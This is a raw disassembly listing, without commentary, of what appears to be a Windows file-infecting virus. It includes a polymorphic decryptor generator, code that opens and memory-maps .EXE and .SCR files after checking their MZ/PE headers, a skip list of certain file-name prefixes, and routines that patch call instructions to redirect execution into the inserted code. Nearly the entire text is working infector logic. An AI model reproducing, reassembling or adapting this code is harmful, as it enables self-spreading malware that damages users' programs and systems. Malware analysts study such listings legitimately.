mov [ebp+4022A0h], ebx
jmp short loc_3090AC74
; ---------------------------------------------------------------------------
loc_3090ACD8: ; CODE XREF: sub_3090ACA2+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_3090ACA2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090ACDF proc near ; CODE XREF: sub_3090ACA2+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_3090ACF3
xor ecx, ecx
retn
sub_3090ACDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090ACF3 proc near ; CODE XREF: sub_3090ACA2+10�p
; sub_3090ACDF+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3090ABEC
add edx, [ebp+4039AAh]
add edx, esi
loc_3090AD07: ; CODE XREF: sub_3090ACF3+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3090AE18
cmp dword ptr [edx+10h], 0
jz locret_3090AE18
mov eax, [edx+0Ch]
push eax
call sub_3090ABEC
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3090AD2D: ; CODE XREF: sub_3090ACF3+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3090AD4D
cmp cl, 2Eh
jz short loc_3090AD3C
loc_3090AD39: ; CODE XREF: sub_3090ACF3+58�j
inc eax
jmp short loc_3090AD2D
; ---------------------------------------------------------------------------
loc_3090AD3C: ; CODE XREF: sub_3090ACF3+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3090AD39
loc_3090AD4D: ; CODE XREF: sub_3090ACF3+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3090AE10
cmp word ptr [eax-2], 3233h
jnz loc_3090AE10
push esi
cmp dword ptr [edx], 0
jnz short loc_3090AD70
mov ecx, [edx+10h]
jmp short loc_3090AD72
; ---------------------------------------------------------------------------
loc_3090AD70: ; CODE XREF: sub_3090ACF3+76�j
mov ecx, [edx]
loc_3090AD72: ; CODE XREF: sub_3090ACF3+7B�j
add esi, ecx
push ecx
call sub_3090ABEC
add esi, [ebp+4039AAh]
loc_3090AD80: ; CODE XREF: sub_3090ACF3+90�j
; sub_3090ACF3+117�j
lodsd
test eax, eax
js short loc_3090AD80
jz loc_3090AE0F
push dword ptr [ebp+4039AAh]
push eax
call sub_3090ABEC
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3090ADAC: ; CODE XREF: sub_3090ACF3+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3090ADC3
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3090ADAC
; ---------------------------------------------------------------------------
loc_3090ADC3: ; CODE XREF: sub_3090ACF3+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3090AE09
cmp ebx, 0DB6E45A8h
jz short loc_3090AE09
cmp ebx, 0FFA13B59h
jz short loc_3090AE09
cmp ebx, 0ACB522D6h
jz short loc_3090AE09
cmp ebx, 0F358E993h
jz short loc_3090AE09
cmp ebx, 0F358E97Dh
jz short loc_3090AE09
cmp ebx, 0E1253F46h
jz short loc_3090AE09
cmp ebx, 0E1253F30h
jz short loc_3090AE09
call dword ptr [ebp+403992h]
loc_3090AE09: ; CODE XREF: sub_3090ACF3+D6�j
; sub_3090ACF3+DE�j ...
pop ebx
jmp loc_3090AD80
; ---------------------------------------------------------------------------
loc_3090AE0F: ; CODE XREF: sub_3090ACF3+92�j
pop esi
loc_3090AE10: ; CODE XREF: sub_3090ACF3+60�j
; sub_3090ACF3+6C�j
add edx, 14h
jmp loc_3090AD07
; ---------------------------------------------------------------------------
locret_3090AE18: ; CODE XREF: sub_3090ACF3+18�j
; sub_3090ACF3+22�j
retn
sub_3090ACF3 endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_3090AE1A proc near ; CODE XREF: UPX2:3090AF58�p
; UPX2:3090AF7E�p
push 4
pop eax
call sub_3090A437
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_3090A437
add edx, 8
xchg edx, ecx
loc_3090AE42: ; CODE XREF: sub_3090AE1A:loc_3090AE81�j
push 5
pop eax
call sub_3090A437
cmp dl, 3
jnb short loc_3090AE5A
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_3090AE81
; ---------------------------------------------------------------------------
loc_3090AE5A: ; CODE XREF: sub_3090AE1A+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_3090AE7B
mov al, 11h
call sub_3090A437
mov eax, 1
loc_3090AE6F: ; CODE XREF: sub_3090AE1A+5D�j
test dl, dl
jz short loc_3090AE80
shl eax, 1
dec dl
jmp short loc_3090AE6F
; ---------------------------------------------------------------------------
jmp short loc_3090AE80
; ---------------------------------------------------------------------------
loc_3090AE7B: ; CODE XREF: sub_3090AE1A+47�j
mov eax, 80000000h
loc_3090AE80: ; CODE XREF: sub_3090AE1A+57�j
; sub_3090AE1A+5F�j
stosd
loc_3090AE81: ; CODE XREF: sub_3090AE1A+3E�j
loop loc_3090AE42
retn
sub_3090AE1A endp
; ---------------------------------------------------------------------------
loc_3090AE84: ; CODE XREF: sub_3090B8DE+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3090AE99
mov al, 60h
stosb
loc_3090AE99: ; CODE XREF: UPX2:3090AE94�j
test dword ptr [ebp+403431h], 1000003h
jz loc_3090AF9F
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EE1A5A5Dh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3090AF17
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_3090AEE2
mov eax, 2E8B6467h
loc_3090AEE2: ; CODE XREF: UPX2:3090AEDB�j
stosd
mov ax, 0
stosw
jz short loc_3090AEEE
mov al, 5Dh
stosb
loc_3090AEEE: ; CODE XREF: UPX2:3090AEE9�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3090AF15
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3090AF15
mov eax, 0F8ED83h
loc_3090AF15: ; CODE XREF: UPX2:3090AEFD�j
; UPX2:3090AF0E�j
stosd
dec edi
loc_3090AF17: ; CODE XREF: UPX2:3090AECA�j
test dword ptr [ebp+403431h], 3
jz short loc_3090AF27
mov al, 0E9h
stosb
stosd
loc_3090AF27: ; CODE XREF: UPX2:3090AF21�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_3090AF9F
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3090AE1A
mov al, 20h
call sub_3090AC33
jecxz short loc_3090AF9F
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_3090AF92
call sub_3090AE1A
mov al, 1Fh
call sub_3090AC33
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_3090AF92: ; CODE XREF: UPX2:3090AF7C�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_3090AF9F: ; CODE XREF: UPX2:3090AEA3�j
; UPX2:3090AF3E�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3090AFBD
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3090AFBD: ; CODE XREF: UPX2:3090AFA9�j
test dword ptr [ebp+403431h], 8
jnz short loc_3090B013
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3090B013
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_3090B011
mov al, 49h
stosb
mov ax, 0FC75h
loc_3090B011: ; CODE XREF: UPX2:3090B008�j
stosw
loc_3090B013: ; CODE XREF: UPX2:3090AFC7�j
; UPX2:3090AFD0�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3090B034
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3090B034: ; CODE XREF: UPX2:3090B029�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3090B047
add ah, 28h
loc_3090B047: ; CODE XREF: UPX2:3090B042�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_3090B06B
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3090B06B: ; CODE XREF: UPX2:3090B060�j
test dword ptr [ebp+403431h], 80h
jnz short loc_3090B082
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_3090B0BF
; ---------------------------------------------------------------------------
loc_3090B082: ; CODE XREF: UPX2:3090B075�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_3090B094
mov al, 29h
loc_3090B094: ; CODE XREF: UPX2:3090B090�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_3090B0B7
mov ah, 0C8h
loc_3090B0B7: ; CODE XREF: UPX2:3090B0B3�j
or ah, [ebp+40342Ah]
stosw
loc_3090B0BF: ; CODE XREF: UPX2:3090B080�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_3090B143
test dword ptr [ebp+403431h], 400h
jnz short loc_3090B0EE
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_3090B13B
; ---------------------------------------------------------------------------
loc_3090B0EE: ; CODE XREF: UPX2:3090B0E1�j
test dword ptr [ebp+403431h], 800h
jnz short loc_3090B10B
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_3090B120
; ---------------------------------------------------------------------------
loc_3090B10B: ; CODE XREF: UPX2:3090B0F8�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_3090B120: ; CODE XREF: UPX2:3090B109�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_3090B133
add ah, 8
loc_3090B133: ; CODE XREF: UPX2:3090B12E�j
or ah, [ebp+40342Bh]
stosw
loc_3090B13B: ; CODE XREF: UPX2:3090B0EC�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_3090B143: ; CODE XREF: UPX2:3090B0D5�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_3090B158
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3090B158: ; CODE XREF: UPX2:3090B14D�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_3090B168
add al, 4
loc_3090B168: ; CODE XREF: UPX2:3090B164�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_3090B185
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3090B185: ; CODE XREF: UPX2:3090B17C�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_3090B197
mov ah, 29h
loc_3090B197: ; CODE XREF: UPX2:3090B193�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_3090B1B5
mov al, 86h
loc_3090B1B5: ; CODE XREF: UPX2:3090B1B1�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_3090B1C9
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3090B1C9: ; CODE XREF: UPX2:3090B1C0�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_3090B1E0
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_3090B1EF
; ---------------------------------------------------------------------------
loc_3090B1E0: ; CODE XREF: UPX2:3090B1D3�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_3090B1EF: ; CODE XREF: UPX2:3090B1DE�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_3090B22A
test dword ptr [ebp+403431h], 40000h
jnz short loc_3090B221
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3090B229
; ---------------------------------------------------------------------------
loc_3090B221: ; CODE XREF: UPX2:3090B205�j
mov al, 40h
or al, [ebp+40342Bh]
loc_3090B229: ; CODE XREF: UPX2:3090B21F�j
stosb
loc_3090B22A: ; CODE XREF: UPX2:3090B1F9�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_3090B246
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_3090B24E
; ---------------------------------------------------------------------------
loc_3090B246: ; CODE XREF: UPX2:3090B234�j
mov al, 48h
or al, [ebp+40342Ah]
loc_3090B24E: ; CODE XREF: UPX2:3090B244�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_3090B282
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_3090B29D
mov cl, 77h
jmp short loc_3090B29D
; ---------------------------------------------------------------------------
loc_3090B282: ; CODE XREF: UPX2:3090B25B�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_3090B29D: ; CODE XREF: UPX2:3090B27C�j
; UPX2:3090B280�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_3090B347
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3090B2DE
mov eax, 2E876467h
loc_3090B2DE: ; CODE XREF: UPX2:3090B2D7�j
stosd
mov eax, 0
stosw
jnz short loc_3090B2EE
mov ax, 0E58Bh
stosw
loc_3090B2EE: ; CODE XREF: UPX2:3090B2E6�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_3090B344
test dword ptr [ebp+403431h], 8000000h
jz short loc_3090B336
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_3090B331
mov ax, 424h
stosw
jmp short loc_3090B344
; ---------------------------------------------------------------------------
loc_3090B331: ; CODE XREF: UPX2:3090B327�j
mov al, 8
stosb
jmp short loc_3090B344
; ---------------------------------------------------------------------------
loc_3090B336: ; CODE XREF: UPX2:3090B30E�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_3090B347
; ---------------------------------------------------------------------------
loc_3090B344: ; CODE XREF: UPX2:3090B302�j
; UPX2:3090B32F�j ...
mov al, 0C9h
stosb
loc_3090B347: ; CODE XREF: UPX2:3090B2BA�j
; UPX2:3090B342�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3090B373
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_3090B373: ; CODE XREF: UPX2:3090B351�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_3090B3DE
test dword ptr [ebp+403431h], 20000000h
jz short loc_3090B3A4
loc_3090B397: ; CODE XREF: UPX2:3090B3A2�j
test edi, 3
jz short loc_3090B3A4
mov al, 90h
stosb
jmp short loc_3090B397
; ---------------------------------------------------------------------------
loc_3090B3A4: ; CODE XREF: UPX2:3090B395�j
; UPX2:3090B39D�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_3090B3D2
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_3090B3DC
; ---------------------------------------------------------------------------
loc_3090B3D2: ; CODE XREF: UPX2:3090B3C4�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_3090B3DC: ; CODE XREF: UPX2:3090B3D0�j
stosw
loc_3090B3DE: ; CODE XREF: UPX2:3090B389�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3090B45D
test dword ptr [ebp+403431h], 20000000h
jz short loc_3090B403
loc_3090B3F6: ; CODE XREF: UPX2:3090B401�j
test edi, 3
jz short loc_3090B403
mov al, 90h
stosb
jmp short loc_3090B3F6
; ---------------------------------------------------------------------------
loc_3090B403: ; CODE XREF: UPX2:3090B3F4�j
; UPX2:3090B3FC�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_3090B42C
lea eax, [ebp+403429h]
loc_3090B424: ; CODE XREF: UPX2:3090B42A�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3090B424
loc_3090B42C: ; CODE XREF: UPX2:3090B41C�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3090B441
mov ax, 0C031h
stosw
loc_3090B441: ; CODE XREF: UPX2:3090B439�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3090B45A
mov ax, 0C031h
stosw
loc_3090B45A: ; CODE XREF: UPX2:3090B452�j
mov al, 0C3h
stosb
loc_3090B45D: ; CODE XREF: UPX2:3090B3E8�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3090B475
push edi
sub edi, eax
pop eax
jmp short loc_3090B48E
; ---------------------------------------------------------------------------
loc_3090B475: ; CODE XREF: UPX2:3090B46D�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3090B48E: ; CODE XREF: UPX2:3090B473�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_3090B4AE
neg eax
loc_3090B4AE: ; CODE XREF: UPX2:3090B4AA�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3090B4B2 proc near ; CODE XREF: sub_3090B8DE+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3090B69A
call near ptr loc_3090B4D2+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3090B4D2: ; CODE XREF: sub_3090B4B2+F�p
add bh, bh
sub_3090B4B2 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3090ABEC
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3090ABEC
mov edi, [ebp+4039A6h]
push esi
call sub_3090ABEC
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3090B69A
jz loc_3090B69A
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_3090B66B
loc_3090B54C: ; CODE XREF: sub_3090B66B+29�j
lodsb
cmp al, 0E8h
jnz loc_3090B5F7
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3090ABEC
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_3090B57A
cmp eax, [edi+0Ch]
jnb loc_3090B693
jmp short loc_3090B586
; ---------------------------------------------------------------------------
loc_3090B57A: ; CODE XREF: sub_3090B66B-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3090B693
loc_3090B586: ; CODE XREF: sub_3090B66B-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3090B693
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3090ABEC
cmp [ebp+4039A6h], edi
jnz loc_3090B693
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3090B693
cmp eax, [edi+8]
jnb loc_3090B693
loc_3090B5CF: ; CODE XREF: sub_3090B66B+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3090B6A9
jmp loc_3090B693
; ---------------------------------------------------------------------------
loc_3090B5F7: ; CODE XREF: sub_3090B66B-11C�j
cmp al, 0FFh
jnz loc_3090B693
cmp byte ptr [esi], 15h
jnz loc_3090B693
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3090ABEC
cmp [ebp+4039A6h], edi
jnz short loc_3090B693
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_3090B640
cmp eax, [ebp+4039C6h]
jb short loc_3090B6A9
loc_3090B640: ; CODE XREF: sub_3090B66B-35�j
cmp eax, 70000000h
jb short loc_3090B67E
call sub_3090B66B
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_3090B66A
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3090B685
; ---------------------------------------------------------------------------
locret_3090B66A: ; CODE XREF: sub_3090B66B-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3090B66B
; =============== S U B R O U T I N E =======================================
sub_3090B66B proc near ; CODE XREF: sub_3090B66B-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3090B54C SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3090ACF3
popa
loc_3090B67E: ; CODE XREF: sub_3090B66B-26�j
test eax, 80000000h
jnz short loc_3090B693
loc_3090B685: ; CODE XREF: sub_3090B66B-3�j
sub eax, [edi+0Ch]
jb short loc_3090B693
cmp eax, [edi+8]
jb loc_3090B5CF
loc_3090B693: ; CODE XREF: sub_3090B66B-F9�j
; sub_3090B66B-EB�j ...
dec ecx
jnz loc_3090B54C
loc_3090B69A: ; CODE XREF: sub_3090B4B2+9�j
; UPX2:3090B534�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3090B6E5
; ---------------------------------------------------------------------------
loc_3090B6A9: ; CODE XREF: sub_3090B66B-7F�j
; sub_3090B66B-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3090B6E5: ; CODE XREF: sub_3090B66B+3C�j
pop edi
pop esi
retn
sub_3090B66B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3090B6E8 proc near ; CODE XREF: UPX2:3090B8B6�p
; sub_3090B8DE+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3090B7B9
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3090B7B9
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3090BC71
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3090BC65
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3090BC65
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3090BC65
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3090BC3D
mov [ebp+403972h], eax
locret_3090B7B9: ; CODE XREF: sub_3090B6E8+10�j
; sub_3090B6E8+27�j ...
retn
sub_3090B6E8 endp
; =============== S U B R O U T I N E =======================================
sub_3090B7BA proc near ; CODE XREF: sub_3090B8DE+117�p
; sub_3090B8DE+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3090B7D4
add eax, [ebp+40106Dh]
loc_3090B7D4: ; CODE XREF: sub_3090B7BA+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3090B7BA endp
; =============== S U B R O U T I N E =======================================
sub_3090B7FF proc near ; CODE XREF: sub_3090B8DE:loc_3090B92D�p
; sub_3090B8DE+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3090B804: ; CODE XREF: sub_3090B7FF+23�j
jecxz short locret_3090B83B
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3090B83B
cmp dword ptr [edx+0Ch], 1
jb short loc_3090B804
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3090B83B: ; CODE XREF: sub_3090B7FF:loc_3090B804�j
; sub_3090B7FF+1D�j ...
retn
sub_3090B7FF endp
; =============== S U B R O U T I N E =======================================
sub_3090B83C proc near ; CODE XREF: UPX2:3090B8C8�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3090B83C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3090B849: ; CODE XREF: UPX2:3090B86A�j
mov ecx, edi
jmp short loc_3090B858
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3090B854: ; CODE XREF: UPX2:3090B866�j
mov ebx, edi
xor ecx, ecx
loc_3090B858: ; CODE XREF: UPX2:3090B84B�j
; UPX2:3090B86E�j
lodsb
cmp al, 61h
jb short loc_3090B863
cmp al, 7Ah
ja short loc_3090B863
sub al, 20h
loc_3090B863: ; CODE XREF: UPX2:3090B85B�j
; UPX2:3090B85F�j
stosb
cmp al, 5Ch
jz short loc_3090B854
cmp al, 2Eh
jz short loc_3090B849
cmp al, 0
jnz short loc_3090B858
jecxz short locret_3090B83B
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3090B886
cmp eax, 524353h
jnz locret_3090B7B9
loc_3090B886: ; CODE XREF: UPX2:3090B879�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3090B7B9
cmp eax, 4E554357h
jz locret_3090B7B9
cmp eax, 32334357h
jz locret_3090B7B9
cmp eax, 4F545350h
jz locret_3090B7B9
xor ebx, ebx
call sub_3090B6E8
jz locret_3090B7B9
xor edx, edx
call sub_3090B8DE
call sub_3090B83C
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3090BC1B
; =============== S U B R O U T I N E =======================================
sub_3090B8DE proc near ; CODE XREF: UPX2:3090B8C3�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3090BC1B
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3090BC1B
test dword ptr [ebx+16h], 2000h
jnz loc_3090BC1B
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3090BC1B
jecxz short loc_3090B92D
cmp ecx, 101h
jbe loc_3090BC1B
loc_3090B92D: ; CODE XREF: sub_3090B8DE+41�j
call sub_3090B7FF
jb loc_3090BC1B
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
